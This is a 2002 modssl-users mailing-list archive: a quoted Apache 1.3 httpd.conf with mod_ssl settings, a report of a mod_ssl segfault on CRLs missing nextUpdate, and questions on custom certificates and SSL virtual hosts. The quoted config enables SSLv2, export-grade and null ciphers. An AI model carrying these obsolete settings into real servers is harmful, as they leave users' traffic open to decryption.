>     # Despite the name similarity, the following Add* directives have nothing
>     # to do with the FancyIndexing customization directives above.
>     #
>     AddEncoding x-compress Z
>     AddEncoding x-gzip gz tgz
> 
>     #
>     # AddLanguage allows you to specify the language of a document. You can
>     # then use content negotiation to give a browser a file in a language
>     # it can understand.  
>     #
>     # Note 1: The suffix does not have to be the same as the language 
>     # keyword --- those with documents in Polish (whose net-standard 
>     # language code is pl) may wish to use "AddLanguage pl .po" to 
>     # avoid the ambiguity with the common suffix for perl scripts.
>     #
>     # Note 2: The example entries below illustrate that in quite
>     # some cases the two character 'Language' abbreviation is not
>     # identical to the two character 'Country' code for its country,
>     # E.g. 'Danmark/dk' versus 'Danish/da'.
>     #
>     # Note 3: In the case of 'ltz' we violate the RFC by using a three char 
>     # specifier. But there is 'work in progress' to fix this and get 
>     # the reference data for rfc1766 cleaned up.
>     #
>     # Danish (da) - Dutch (nl) - English (en) - Estonian (ee)
>     # French (fr) - German (de) - Greek-Modern (el)
>     # Italian (it) - Korean (kr) - Norwegian (no) - Norwegian Nynorsk (nn)
>     # Portugese (pt) - Luxembourgeois* (ltz)
>     # Spanish (es) - Swedish (sv) - Catalan (ca) - Czech(cz)
>     # Polish (pl) - Brazilian Portuguese (pt-br) - Japanese (ja)
>     # Russian (ru)
>     #
>     AddLanguage da .dk
>     AddLanguage nl .nl
>     AddLanguage en .en
>     AddLanguage et .ee
>     AddLanguage fr .fr
>     AddLanguage de .de
>     AddLanguage el .el
>     AddLanguage he .he
>     AddCharset ISO-8859-8 .iso8859-8
>     AddLanguage it .it
>     AddLanguage ja .ja
>     AddCharset ISO-2022-JP .jis
>     AddLanguage kr .kr
>     AddCharset ISO-2022-KR .iso-kr
>     AddLanguage nn .nn
>     AddLanguage no .no
>     AddLanguage pl .po
>     AddCharset ISO-8859-2 .iso-pl
>     AddLanguage pt .pt
>     AddLanguage pt-br .pt-br
>     AddLanguage ltz .lu
>     AddLanguage ca .ca
>     AddLanguage es .es
>     AddLanguage sv .sv
>     AddLanguage cz .cz
>     AddLanguage ru .ru
>     AddLanguage zh-tw .tw
>     AddLanguage tw .tw
>     AddCharset Big5         .Big5    .big5
>     AddCharset WINDOWS-1251 .cp-1251
>     AddCharset CP866        .cp866
>     AddCharset ISO-8859-5   .iso-ru
>     AddCharset KOI8-R       .koi8-r
>     AddCharset UCS-2        .ucs2
>     AddCharset UCS-4        .ucs4
>     AddCharset UTF-8        .utf8
> 
>     # LanguagePriority allows you to give precedence to some languages
>     # in case of a tie during content negotiation.
>     #
>     # Just list the languages in decreasing order of preference. We have
>     # more or less alphabetized them here. You probably want to change this.
>     #
>     
>         LanguagePriority en da nl et fr de el it ja kr no pl pt pt-br ru ltz ca es sv tw
>     
> 
>     #
>     # AddType allows you to tweak mime.types without actually editing it, or to
>     # make certain files to be certain types.
>     #
>     AddType application/x-tar .tgz
>     AddType image/x-icon .ico
> 
>     #
>     # AddHandler allows you to map certain file extensions to "handlers",
>     # actions unrelated to filetype. These can be either built into the server
>     # or added with the Action command (see below)
>     #
>     # If you want to use server side includes, or CGI outside
>     # ScriptAliased directories, uncomment the following lines.
>     #
>     # To use CGI scripts:
>     #
>     #AddHandler cgi-script .cgi
> 
>     #
>     # To use server-parsed HTML files
>     #
>     #AddType text/html .shtml
>     #AddHandler server-parsed .shtml
> 
>     #
>     # Uncomment the following line to enable Apache's send-asis HTTP file
>     # feature
>     #
>     #AddHandler send-as-is asis
> 
>     #
>     # If you wish to use server-parsed imagemap files, use
>     #
>     #AddHandler imap-file map
> 
>     #
>     # To enable type maps, you might want to use
>     #
>     #AddHandler type-map var
> 
> 
> # End of document types.
> 
> #
> # Action lets you define media types that will execute a script whenever
> # a matching file is called. This eliminates the need for repeated URL
> # pathnames for oft-used CGI file processors.
> # Format: Action media/type /cgi-script/location
> # Format: Action handler-name /cgi-script/location
> #
> 
> #
> # MetaDir: specifies the name of the directory in which Apache can find
> # meta information files. These files contain additional HTTP headers
> # to include when sending the document
> #
> #MetaDir .web
> 
> #
> # MetaSuffix: specifies the file name suffix for the file containing the
> # meta information.
> #
> #MetaSuffix .meta
> 
> #
> # Customizable error response (Apache style)
> #  these come in three flavors
> #
> #    1) plain text
> #ErrorDocument 500 "The server made a boo boo.
> #  n.b.  the single leading (") marks it as text, it does not get output
> #
> #    2) local redirects
> #ErrorDocument 404 /missing.html
> #  to redirect to local URL /missing.html
> #ErrorDocument 404 /cgi-bin/missing_handler.pl
> #  N.B.: You can redirect to a script or a document using server-side-includes.
> #
> #    3) external redirects
> #ErrorDocument 402 http://some.other-server.com/subscription_info.html
> #  N.B.: Many of the environment variables associated with the original
> #  request will *not* be available to such a script.
> 
> #
> # Customize behaviour based on the browser
> #
> 
> 
>     #
>     # The following directives modify normal HTTP response behavior.
>     # The first directive disables keepalive for Netscape 2.x and browsers that
>     # spoof it. There are known problems with these browser implementations.
>     # The second directive is for Microsoft Internet Explorer 4.0b2
>     # which has a broken HTTP/1.1 implementation and does not properly
>     # support keepalive when it is used on 301 or 302 (redirect) responses.
>     #
>     BrowserMatch "Mozilla/2" nokeepalive
>     BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0
> 
>     #
>     # The following directive disables HTTP/1.1 responses to browsers which
>     # are in violation of the HTTP/1.0 spec by not being able to grok a
>     # basic 1.1 response.
>     #
>     BrowserMatch "RealPlayer 4\.0" force-response-1.0
>     BrowserMatch "Java/1\.0" force-response-1.0
>     BrowserMatch "JDK/1\.0" force-response-1.0
> 
> 
> # End of browser customization directives
> 
> #
> # Allow server status reports, with the URL of http://servername/server-status
> # Change the ".your-domain.com" to match your domain to enable.
> #
> #
> #    SetHandler server-status
> #    Order deny,allow
> #    Deny from all
> #    Allow from .your-domain.com
> #
> 
> #
> # Allow remote server configuration reports, with the URL of
> # http://servername/server-info (requires that mod_info.c be loaded).
> # Change the ".your-domain.com" to match your domain to enable.
> #
> #
> #    SetHandler server-info
> #    Order deny,allow
> #    Deny from all
> #    Allow from .your-domain.com
> #
> 
> #
> # There have been reports of people trying to abuse an old bug from pre-1.1
> # days.  This bug involved a CGI script distributed as a part of Apache.
> # By uncommenting these lines you can redirect these attacks to a logging 
> # script on phf.apache.org.  Or, you can record them yourself, using the script
> # support/phf_abuse_log.cgi.
> #
> #
> #    Deny from all
> #    ErrorDocument 403 http://phf.apache.org/phf_abuse_log.cgi
> #
> 
> #
> # Proxy Server directives. Uncomment the following lines to
> # enable the proxy server:
> #
> #
> #    ProxyRequests On
> 
> #    
> #        Order deny,allow
> #        Deny from all
> #        Allow from .your-domain.com
> #    
> 
>     #
>     # Enable/disable the handling of HTTP/1.1 "Via:" headers.
>     # ("Full" adds the server version; "Block" removes all outgoing Via: headers)
>     # Set to one of: Off | On | Full | Block
>     #
> #    ProxyVia On
> 
>     #
>     # To enable the cache as well, edit and uncomment the following lines:
>     # (no cacheing without CacheRoot)
>     #
> #    CacheRoot "/usr/local/apache1.3/proxy"
> #    CacheSize 5
> #    CacheGcInterval 4
> #    CacheMaxExpire 24
> #    CacheLastModifiedFactor 0.1
> #    CacheDefaultExpire 1
> #    NoCache a-domain.com another-domain.edu joes.garage-sale.com
> 
> #
> # End of proxy directives.
> 
> ### Section 3: Virtual Hosts
> #
> # VirtualHost: If you want to maintain multiple domains/hostnames on your
> # machine you can setup VirtualHost containers for them. Most configurations
> # use only name-based virtual hosts so the server doesn't need to worry about
> # IP addresses. This is indicated by the asterisks in the directives below.
> #
> # Please see the documentation at 
> # for further details before you try to setup virtual hosts.
> #
> # You may use the command line option '-S' to verify your virtual host
> # configuration.
> 
> #
> # Use name-based virtual hosting.
> #
> #NameVirtualHost *
> 
> #
> # VirtualHost example:
> # Almost any Apache directive may go into a VirtualHost container.
> # The first VirtualHost section is used for requests without a known
> # server name.
> #
> #
> #    ServerAdmin webmaster@dummy-host.example.com
> #    DocumentRoot /www/docs/dummy-host.example.com
> #    ServerName dummy-host.example.com
> #    ErrorLog logs/dummy-host.example.com-error_log
> #    CustomLog logs/dummy-host.example.com-access_log common
> #
> 
> #
> #
> 
> ##
> ##  SSL Global Context
> ##
> ##  All SSL configuration in this context applies both to
> ##  the main server and all SSL-enabled virtual hosts.
> ##
> 
> #
> #   Some MIME-types for downloading Certificates and CRLs
> #
> 
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
> 
> 
> 
> 
> #   Pass Phrase Dialog:
> #   Configure the pass phrase gathering process.
> #   The filtering dialog program (`builtin' is a internal
> #   terminal dialog) has to provide the pass phrase on stdout.
> SSLPassPhraseDialog  builtin
> 
> #   Inter-Process Session Cache:
> #   Configure the SSL Session Cache: First the mechanism 
> #   to use and second the expiring timeout (in seconds).
> #SSLSessionCache        none
> #SSLSessionCache        shmht:/usr/local/apache1.3/logs/ssl_scache(512000)
> #SSLSessionCache        shmcb:/usr/local/apache1.3/logs/ssl_scache(512000)
> SSLSessionCache         dbm:/usr/local/apache1.3/logs/ssl_scache
> SSLSessionCacheTimeout  300
> 
> #   Semaphore:
> #   Configure the path to the mutual exclusion semaphore the
> #   SSL engine uses internally for inter-process synchronization. 
> SSLMutex  file:/usr/local/apache1.3/logs/ssl_mutex
> 
> #   Pseudo Random Number Generator (PRNG):
> #   Configure one or more sources to seed the PRNG of the 
> #   SSL library. The seed data should be of good random quality.
> #   WARNING! On some platforms /dev/random blocks if not enough entropy
> #   is available. This means you then cannot use the /dev/random device
> #   because it would lead to very long connection times (as long as
> #   it requires to make more entropy available). But usually those
> #   platforms additionally provide a /dev/urandom device which doesn't
> #   block. So, if available, use this one instead. Read the mod_ssl User
> #   Manual for more details.
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> #SSLRandomSeed startup file:/dev/random  512
> #SSLRandomSeed startup file:/dev/urandom 512
> #SSLRandomSeed connect file:/dev/random  512
> #SSLRandomSeed connect file:/dev/urandom 512
> 
> #   Logging:
> #   The home of the dedicated SSL protocol logfile. Errors are
> #   additionally duplicated in the general error log file.  Put
> #   this somewhere where it cannot be used for symlink attacks on
> #   a real server (i.e. somewhere where only root can write).
> #   Log levels are (ascending order: higher ones include lower ones):
> #   none, error, warn, info, trace, debug.
> SSLLog      /usr/local/apache1.3/logs/ssl_engine_log
> SSLLogLevel info
> 
> 
> 
> 
> 
> ##
> ## SSL Virtual Host Context
> ##
> 
> #   SSL Engine Switch:
> #   Enable/Disable SSL for this virtual host.
> #SSLEngine on
> 
> #   SSL Cipher Suite:
> #   List the ciphers that the client is permitted to negotiate.
> #   See the mod_ssl documentation for a complete list.
> SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> 
> #   Server Certificate:
> #   Point SSLCertificateFile at a PEM encoded certificate.  If
> #   the certificate is encrypted, then you will be prompted for a
> #   pass phrase.  Note that a kill -HUP will prompt again. A test
> #   certificate can be generated with `make certificate' under
> #   built time. Keep in mind that if you've both a RSA and a DSA
> #   certificate you can configure both in parallel (to also allow
> #   the use of DSA ciphers, etc.)
> SSLCertificateFile /usr/local/apache1.3/conf/ssl.crt/server.crt
> #SSLCertificateFile /usr/local/apache1.3/conf/ssl.crt/server-dsa.crt
> 
> #   Server Private Key:
> #   If the key is not combined with the certificate, use this
> #   directive to point at the key file.  Keep in mind that if
> #   you've both a RSA and a DSA private key you can configure
> #   both in parallel (to also allow the use of DSA ciphers, etc.)
> SSLCertificateKeyFile /usr/local/apache1.3/conf/ssl.key/server.key
> #SSLCertificateKeyFile /usr/local/apache1.3/conf/ssl.key/server-dsa.key
> 
> #   Server Certificate Chain:
> #   Point SSLCertificateChainFile at a file containing the
> #   concatenation of PEM encoded CA certificates which form the
> #   certificate chain for the server certificate. Alternatively
> #   the referenced file can be the same as SSLCertificateFile
> #   when the CA certificates are directly appended to the server
> #   certificate for convinience.
> #SSLCertificateChainFile /usr/local/apache1.3/conf/ssl.crt/ca.crt
> 
> #   Certificate Authority (CA):
> #   Set the CA certificate verification path where to find CA
> #   certificates for client authentication or alternatively one
> #   huge file containing all of them (file must be PEM encoded)
> #   Note: Inside SSLCACertificatePath you need hash symlinks
> #         to point to the certificate files. Use the provided
> #         Makefile to update the hash symlinks after changes.
> #SSLCACertificatePath /usr/local/apache1.3/conf/ssl.crt
> #SSLCACertificateFile /usr/local/apache1.3/conf/ssl.crt/ca-bundle.crt
> 
> #   Certificate Revocation Lists (CRL):
> #   Set the CA revocation path where to find CA CRLs for client
> #   authentication or alternatively one huge file containing all
> #   of them (file must be PEM encoded)
> #   Note: Inside SSLCARevocationPath you need hash symlinks
> #         to point to the certificate files. Use the provided
> #         Makefile to update the hash symlinks after changes.
> #SSLCARevocationPath /usr/local/apache1.3/conf/ssl.crl
> #SSLCARevocationFile /usr/local/apache1.3/conf/ssl.crl/ca-bundle.crl
> 
> #   Client Authentication (Type):
> #   Client certificate verification type and depth.  Types are
> #   none, optional, require and optional_no_ca.  Depth is a
> #   number which specifies how deeply to verify the certificate
> #   issuer chain before deciding the certificate is not valid.
> #SSLVerifyClient require
> #SSLVerifyDepth  10
> 
> #   Access Control:
> #   With SSLRequire you can do per-directory access control based
> #   on arbitrary complex boolean expressions containing server
> #   variable checks and other lookup directives.  The syntax is a
> #   mixture between C and Perl.  See the mod_ssl documentation
> #   for more details.
> #
> #SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
> #            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
> #            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
> #            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
> #            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
> #           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
> #
> 
> #   SSL Engine Options:
> #   Set various options for the SSL engine.
> #   o FakeBasicAuth:
> #     Translate the client X.509 into a Basic Authorisation.  This means that
> #     the standard Auth/DBMAuth methods can be used for access control.  The
> #     user name is the `one line' version of the client's X.509 certificate.
> #     Note that no password is obtained from the user. Every entry in the user
> #     file needs this password: `xxj31ZMTZzkVA'.
> #   o ExportCertData:
> #     This exports two additional environment variables: SSL_CLIENT_CERT and
> #     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
> #     server (always existing) and the client (only existing when client
> #     authentication is used). This can be used to import the certificates
> #     into CGI scripts.
> #   o StdEnvVars:
> #     This exports the standard SSL/TLS related `SSL_*' environment variables.
> #     Per default this exportation is switched off for performance reasons,
> #     because the extraction step is an expensive operation and is usually
> #     useless for serving static content. So one usually enables the
> #     exportation for CGI and SSI requests only.
> #   o CompatEnvVars:
> #     This exports obsolete environment variables for backward compatibility
> #     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use this
> #     to provide compatibility to existing CGI scripts.
> #   o StrictRequire:
> #     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
> #     under a "Satisfy any" situation, i.e. when it applies access is denied
> #     and no other module can change it.
> #   o OptRenegotiate:
> #     This enables optimized SSL connection renegotiation handling when SSL
> #     directives are used in per-directory context. 
> #SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
> 
> #   SSL Protocol Adjustments:
> #   The safe and default but still SSL/TLS standard compliant shutdown
> #   approach is that mod_ssl sends the close notify alert but doesn't wait for
> #   the close notify alert from client. When you need a different shutdown
> #   approach you can use one of the following variables:
> #   o ssl-unclean-shutdown:
> #     This forces an unclean shutdown when the connection is closed, i.e. no
> #     SSL close notify alert is send or allowed to received.  This violates
> #     the SSL/TLS standard but is needed for some brain-dead browsers. Use
> #     this when you receive I/O errors because of the standard approach where
> #     mod_ssl sends the close notify alert.
> #   o ssl-accurate-shutdown:
> #     This forces an accurate shutdown when the connection is closed, i.e. a
> #     SSL close notify alert is send and mod_ssl waits for the close notify
> #     alert of the client. This is 100% SSL/TLS standard compliant, but in
> #     practice often causes hanging connections with brain-dead browsers. Use
> #     this only for browsers where you know that their SSL implementation
> #     works correctly. 
> #   Notice: Most problems of broken clients are also related to the HTTP
> #   keep-alive facility, so you usually additionally want to disable
> #   keep-alive for those clients, too. Use variable "nokeepalive" for this.
> #   Similarly, one has to force some clients to use HTTP/1.0 to workaround
> #   their broken HTTP/1.1 implementation. Use variables "downgrade-1.0" and
> #   "force-response-1.0" for this.
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
> 
> #   Per-Server Logging:
> #   The home of a custom SSL log file. Use this when you want a
> #   compact non-error SSL logfile on a virtual host basis.
> CustomLog /usr/local/apache1.3/logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> 
> 
> 
> 
> 
> # Tomcat mod_jk include
> Include /usr/local/tomcat/conf/auto/mod_jk.conf
> JkMount /*.xml ajp13
> 
> JkExtractSSL On
> JkHTTPSIndicator HTTPS
> JkSESSIONIndicator SSL_SESSION_ID
> JkCIPHERIndicator SSL_CIPHER
> JkCERTSIndicator SSL_CLIENT_CERT
> 
> # End of Tomcat mod_jk directives
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 11:54:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA02144; Wed, 20 Nov 2002 11:53:23 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ware-mail.radware.co.il id LAA02133; Wed, 20 Nov 2002 11:53:10 +0100 (MET)
Received: by WARE-MAIL with Internet Mail Service (5.5.2653.19)
	id ; Wed, 20 Nov 2002 11:04:11 +0200
Message-ID: <45FCD7CD775DD411B4C100508B691BBB04B62016@WARE-MAIL>
From: Alon Philosoph 
To: modssl-users@modssl.org
Subject: missing CRL nextUpdate field - Bug in mod_ssl (seg fault)
Date: Wed, 20 Nov 2002 11:04:09 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C29073.C9981020"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alon Philosoph 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C29073.C9981020
Content-Type: text/plain;
	charset="windows-1255"

Hi,
 
When using a CRL without the nextUpdate field (you can create such CRL in
iPlanet), I get a segmentation fault (using mod_ssl-2.8.8-1.3.24).
 
This occurs in the call:
 
i = X509_cmp_current_time(X509_CRL_get_nextUpdate(crl));
 
since X509_CRL_get_nextUpdate(crl) returns NULL in this situation.

------_=_NextPart_001_01C29073.C9981020
Content-Type: text/html;
	charset="windows-1255"









Hi,


 


When using a CRL without the 
nextUpdate field (you can create such CRL in iPlanet), I get a segmentation 
fault (using mod_ssl-2.8.8-1.3.24).


 


This occurs in the 
call:


 


i = 
X509_cmp_current_time(X509_CRL_get_nextUpdate(crl));


 


since 
X509_CRL_get_nextUpdate(crl) returns NULL in this 
situation.


------_=_NextPart_001_01C29073.C9981020--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 15:18:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA10322; Wed, 20 Nov 2002 15:17:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ms1kw.tx.shawcable.net id PAA10315; Wed, 20 Nov 2002 15:16:28 +0100 (MET)
Received: from 127.0.0.1 (localhost [127.0.0.1])
	by dummy.domain.name (Postfix) with SMTP
	id C2B18350135; Wed, 20 Nov 2002 08:15:14 -0600 (CST)
Received: by ms1kw.tx.shawcable.net (Postfix, from userid 48)
	id 728543500E3; Wed, 20 Nov 2002 08:15:14 -0600 (CST)
From: "Ronnie Clark" 
To: modssl-users@modssl.org, freebsd-questions@freebsd.org
Subject: Re: FreeBSD 4.x and Apache+mod_ssl
X-Mailer: NeoMail 1.25
X-IPAddress: 63.89.83.220
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Message-Id: <20021120141514.728543500E3@ms1kw.tx.shawcable.net>
Date: Wed, 20 Nov 2002 08:15:14 -0600 (CST)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ronnie Clark" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Marcel, 

Thanks for the help, but I am either too sleepy or too slow to make 
this work right. I did these steps from the /usr/ports/www/apache13-
modssl/ directory:
make
make certificate TYPE=custom
make install

When I do the make install, it automatically writes in the snake oil CA 
and server cert, which are old and expired. How do I get it to 
recognize and use my new custom CA and server cert?

Thanks again for the help. I am also sending this to freebsd-questions.
Ron Clark


> from /usr/ports/www/apache13-modssl/ run:
> make certificate TYPE=custom
> 
> and follow the prompts..  remember to copy them to wherever you're 
storing the 
> certs apache uses and run make from that dir to update the links... 
> 
> That should do it :)
> Hope this helps!
> Marcel
> 
> 
> 
> On Tuesday 19 November 2002 21:54, Ronnie Clark wrote:
> > Hello all,
> >
> > I am running FreeBSD 4.7 STABLE and just loaded mysql,
> > Apache13+mod_ssl, and mod_php4 from the ports collection. I got php 
and
> > SSL playing nice together, but I now have a website that is showing 
an
> > invalid cert. How do I generate my own CA and new server cert 
signed by
> > that CA in this format?
> >
> > Thanks in advance,
> > Ron Clark
> >
> >
> > 
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   
www.modssl.org
> > User Support Mailing List                      modssl-
users@modssl.org
> > Automated List Manager                            
majordomo@modssl.org
> 
> -- 
> "They that give up essential liberty to obtain a little temporary 
safety... 
> deserve neither safety nor liberty." - Benjamin Franklin(1759)
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 15:27:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA12049; Wed, 20 Nov 2002 15:26:23 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns1.victor-buck.com id PAA11809; Wed, 20 Nov 2002 15:25:14 +0100 (MET)
Received: from 127.0.0.1 (unknown [172.16.3.10])
	by ns1.victor-buck.com (Postfix) with ESMTP id CA25113FCA
	for ; Wed, 20 Nov 2002 15:07:16 +0100 (CET)
Date: Wed, 20 Nov 2002 15:25:01 +0100
From: Ludovic Perard 
X-Mailer: The Bat! (v1.61)
Organization: Imprimerie Victor Buck
X-Priority: 3 (Normal)
Message-ID: <1191027180657.20021120152501@victor-buck.com>
To: modssl-users@modssl.org
Subject: SSL with multiple domains on same server
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ludovic Perard 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello.

  I'm trying to set up Apache with SSL on Windows 2000.

  It is working but I have some troubles with the certificates.

  If my Apache server is server.mydomain.com and I want to have two
  websites with HTTPS. The SSL is well enabled and works fine.

  It is what I did :

  * openssl req -config openssl.cnf -new -out -website1.csr

    -> then I put "website1.mydomain.com" as common name

  * openssl rsa -in privkey.pem -out website1.key

  * openssl x509 -in website1.csr -out website1.cert -req -signkey website1.key -days 365

    -> To have a temporary signed key

  Then, I did all these operation a second time for the website2.
  (with "website2.mydomain.com" as common name for the second .csr)

  At he end, I have these files :

   - website1.cert
   - website1.key
   - website2.cert
   - website2.key

  In httpd.conf I set up both sites :

  
  SSLEngine On
  SSLCertificateFile ssl/website1.cert
  SSLCertificateKeyFile ssl/website1.key
  

  
  SSLEngine On
  SSLCertificateFile ssl/website2.cert
  SSLCertificateKeyFile ssl/website2.key
  

  website1 and website2 has different IP address

  And then, my problem apears.

  In my browser, I can go two both sites with SSL, but both takes the
  same certificate... Why ? Is there a mismatch between name of the
  server and names of the websites ?

-- 
Best regards,
 Ludovic                           
 ludovic.perard@victor-buck.com


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Nov 20 15:36:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA12525; Wed, 20 Nov 2002 15:35:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0b.swx.com id PAA12485; Wed, 20 Nov 2002 15:34:08 +0100 (MET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gAKEY7t9018229
	for ; Wed, 20 Nov 2002 15:34:07 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gAKEXtEo003503
	for ; Wed, 20 Nov 2002 15:34:06 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: SSL with multiple domains on same server
Date: Wed, 20 Nov 2002 15:33:00 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A552@SOMEXEVS001.ex.ordersx.org>
Importance: normal
Thread-Topic: SSL with multiple domains on same server
Thread-Index: AcKQoQ8bLq5zGzlnT2eBmLjB9+ebvAAAEkFg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You are trying to run two name based VHs under SSL. You cannot do this
(see http://www.modssl.org/docs/2.8/ssl_faq.html#ToC47).

The problem is that SSL encapsulates HTTP so the SSL session has to be
negotiated before any HTTP traffic can be seen. But the hostname is in
the HTTP request, so apache cannot decide which VH to use - so it uses
the first by default.

You need to use separate IPs and/or ports...

Rgds,
Owen Boyle

>-----Original Message-----
>From: Ludovic Perard [mailto:ludovic.perard@victor-buck.com]
>Sent: Mittwoch, 20. November 2002 15:25
>To: modssl-users@modssl.org
>Subject: SSL with multiple domains on same server
>
>
>Hello.
>
>  I'm trying to set up Apache with SSL on Windows 2000.
>
>  It is working but I have some troubles with the certificates.
>
>  If my Apache server is server.mydomain.com and I want to have two
>  websites with HTTPS. The SSL is well enabled and works fine.
>
>  It is what I did :
>
>  * openssl req -config openssl.cnf -new -out -website1.csr
>
>    -> then I put "website1.mydomain.com" as common name
>
>  * openssl rsa -in privkey.pem -out website1.key
>
>  * openssl x509 -in website1.csr -out website1.cert -req 
>-signkey website1.key -days 365
>
>    -> To have a temporary signed key
>
>  Then, I did all these operation a second time for the website2.
>  (with "website2.mydomain.com" as common name for the second .csr)
>
>  At he end, I have these files :
>
>   - website1.cert
>   - website1.key
>   - website2.cert
>   - website2.key
>
>  In httpd.conf I set up both sites :
>
>  
>  SSLEngine On
>  SSLCertificateFile ssl/website1.cert
>  SSLCertificateKeyFile ssl/website1.key
>  
>
>  
>  SSLEngine On
>  SSLCertificateFile ssl/website2.cert
>  SSLCertificateKeyFile ssl/website2.key
>  
>
>  website1 and website2 has different IP address
>
>  And then, my problem apears.
>
>  In my browser, I can go two both sites with SSL, but both takes the
>  same certificate... Why ? Is there a mismatch between name of the
>  server and names of the websites ?
>
>-- 
>Best regards,
> Ludovic                           
> ludovic.perard@victor-buck.com
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

